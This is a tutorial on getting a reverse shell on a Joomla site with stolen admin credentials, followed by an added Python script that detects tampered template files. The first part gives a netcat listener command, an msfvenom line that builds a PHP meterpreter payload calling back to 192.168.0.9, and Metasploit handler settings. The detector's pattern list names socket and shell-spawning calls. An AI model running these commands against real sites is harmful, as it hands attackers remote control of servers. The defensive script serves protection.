Joomla is one of the popular Content Management Systems (CMS) that help you build your website. Joomla has gained its popularity by being user-friendly, as its installation is complication-free, and it is also pretty reliable. In this article, we learn how to get a reverse shell on Joomla.
As you can see in the image below, the website is built with Joomla. Now that we have our Joomla environment, we can start exploiting it.
The attack that we are going to show is categorised as post-exploitation, which means one should have the login credentials for Joomla. The URL of the Joomla login page contains ‘joomla/administrator’; enter the username and password there, as shown in the image below:
Once you are logged in, go to Extensions. A drop-down menu will appear; from this menu select Templates, as shown in the image below:
This will show you the list of templates present on the website. We will exploit one of them, i.e. Beez3 Details and Files.
Once you are in the template, go to index.php as shown in the image below:
This way you will be able to edit index.php in the template, as you can see in the image below:
Now, swap the code of index.php with the reverse shell code found in Kali Linux, and add your IP and port in the code, as shown in the image below:
Now, start a netcat listener to get a session with the following command:
nc -lvp 1234
Another way to get a reverse shell is with msfvenom. For this, type the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=1234 R
The above command will give you the malicious PHP code. Swap this code in just like before and simultaneously start the multi/handler as shown in the image below:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 1234
exploit
These are the two ways to get a reverse shell in Joomla.
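From the defender's side, both methods above leave the same trace: a template's index.php whose contents no longer match the file that was shipped. The following added example (not part of the original article) baselines the PHP files under a templates directory and reports changed or new files and any socket or process-spawning calls; the function names and the sample files are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# PHP functions that open sockets or spawn processes; a page template has no reason to call them.
SUSPICIOUS = re.compile(
    r"\b(fsockopen|pfsockopen|stream_socket_client|socket_create|"
    r"proc_open|popen|shell_exec|passthru|system|exec|eval)\s*\(")

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(templates_dir):
    """Record a hash for every PHP file while the site is in a known-good state."""
    root = Path(templates_dir)
    return {p.relative_to(root).as_posix(): sha256(p) for p in sorted(root.rglob("*.php"))}

def audit(templates_dir, baseline):
    """Return (relative_path, reason) findings for changed, new or suspicious PHP files."""
    root, findings = Path(templates_dir), []
    for p in sorted(root.rglob("*.php")):
        rel = p.relative_to(root).as_posix()
        if rel not in baseline:
            findings.append((rel, "new file"))
        elif baseline[rel] != sha256(p):
            findings.append((rel, "hash changed"))
        calls = sorted(set(SUSPICIOUS.findall(p.read_text(errors="replace"))))
        if calls:
            findings.append((rel, "calls " + ", ".join(calls)))
    return findings

def demo():
    """Constructed sample: a beez3-like template whose index.php gets overwritten."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp) / "beez3"
        tpl.mkdir()
        (tpl / "index.php").write_text("<?php defined('_JEXEC') or die; ?>\n<html></html>\n")
        (tpl / "error.php").write_text("<?php defined('_JEXEC') or die; ?>\n")
        baseline = build_baseline(tmp)
        # Constructed, inert stand-in for an overwritten template; it is only scanned as text.
        (tpl / "index.php").write_text("<?php $s = fsockopen($h, $p); proc_open('sh', $d, $pipes); ?>\n")
        return audit(tmp, baseline)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Build the baseline right after installing or updating a template and store it outside the web root, so that an administrator session that can edit templates cannot also rewrite the baseline.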